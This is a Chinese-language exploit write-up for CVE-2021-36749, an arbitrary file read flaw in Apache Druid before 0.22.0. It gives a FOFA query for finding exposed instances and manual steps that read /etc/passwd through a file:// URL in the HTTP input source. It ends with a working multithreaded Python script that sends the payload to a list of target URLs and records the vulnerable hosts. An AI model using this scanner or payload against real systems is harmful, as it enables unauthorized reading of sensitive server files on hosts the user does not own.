Apache Druid 任意文件读取漏洞(CVE-2021-36749)

0x01 组件介绍

Apache Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。Druid 还支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中使用。

0x02 漏洞详情

该漏洞是由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。

0x03 影响范围

Apache Druid < 0.22.0

0x04 fofa语法

title="Apache Druid"

0x05 漏洞复现

点击“load data”

image-20211121170006754

选择"http(s)://"–>“connect data”

image-20211121170033706

在URLs中输入以下内容

file:///etc/passwd

image-20211121170108693

成功获取/etc/passwd中的内容

image-20211121170118146

脚本批量

# -*- coding: utf-8 -*-
# @Time : 2021/11/21 17:15
# @Auth : AD钙奶
import requests
import threadpool

requests.packages.urllib3.disable_warnings()

def verify(urls):
    url = urls + '/druid/indexer/v1/sampler?for=connect'
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
    json_data = {"type": "index", "spec": {"type": "index", "ioConfig": {"type": "index", "firehose": {"type": "http", "uris": ["file:///etc/passwd"]}}, "dataSchema": {"dataSource": "sample", "parser": {"type": "string", "parseSpec": {"format": "regex", "pattern": "(.*)", "columns": ["a"], "dimensionsSpec": {}, "timestampSpec": {"column": "!!!_no_such_column_!!!", "missingValue": "2010-01-01T00:00:00Z"}}}}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
    try:
        res = requests.post(url, headers=headers, json=json_data, timeout=10, verify=False, allow_redirects=False)
        if 'root❌0' in res.text:
            info = "[+] 存在CVE-2021-36749漏洞: " + urls
            save_vuln(info)
            print(info)
    except Exception as e:
        pass


def save_vuln(info):
    vuln = info + '\n'
    with open("vuln.txt", 'a', encoding='utf-8') as ff:
        ff.write(vuln)


def get_file_url():
    with open("url.txt", 'r', encoding='UTF-8') as f:
        _urls = f.readlines()
    urls = [url.strip() for url in _urls if url and url.strip()]
    return urls


def main():
    url = get_file_url()
    pool = threadpool.ThreadPool(50)
    res = threadpool.makeRequests(verify, url)
    [pool.putRequest(req) for req in res]
    pool.wait()



if __name__ == "__main__":
    main()